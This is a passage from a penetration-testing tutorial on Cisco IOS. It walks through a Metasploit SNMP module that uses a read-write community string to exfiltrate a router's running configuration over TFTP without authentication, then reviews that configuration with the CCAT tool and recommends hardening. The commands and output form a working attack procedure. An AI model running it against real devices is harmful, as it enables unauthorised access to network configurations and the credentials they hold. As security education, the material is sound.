192.168.1.89 [cisco] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2020 by Cisco Systems, Inc. Compiled Sat 31-Oct-20 13:1
In my case, it is the string cisco
that has RW permissions that is used for this attack
Now you need to run MSF and the cisco_config_tftp
module
caster@kali:~$ msfconsole
msf6 > auxiliary/scanner/snmp/cisco_config_tftp
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > show options
Module options (auxiliary/scanner/snmp/cisco_config_tftp):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
LHOST no The IP address of the system running this module
OUTPUTDIR no The directory where we should save the configuration files (disabled by default)
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 161 yes The target port (UDP)
SOURCE 4 yes Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/snmp/cisco_config_tftp) >
By specifying the string, address, and directory where the Cisco configuration file will be uploaded, the module will upload the configuration file:
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY cisco
COMMUNITY => cisco
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/caster/
OUTPUTDIR => /home/caster/
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > run
[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 192.168.1.89...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 192.168.1.89 - 192.168.1.89.txt 6210 bytes
[*] Saved configuration file to /home/caster/192.168.1.89.txt
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/snmp/cisco_config_tftp) >
Thus, when an RW string is detected, you can read Cisco router configuration files without authentication. It is highly recommended to use more complex community strings, filter access to the SNMP port using ACLs.
Config Analyzing
CCAT - is a tool that automates the process of finding network security issues in a Cisco IOS configuration file. It is quite a powerful solution, as it analyzes in detail every part of the configuration, routing, switch ports, DP, etc
caster@kali:~/ccat$ python3 ccat.py ~/192.168.1.89.txt
This tool makes life easier for network engineers and system administrators. CCAT also allows you to improve the quality of device hardening.
Outro
In this article I have demonstrated attacks on Cisco IOS, I expect this article will help both pentesters and network security professionals.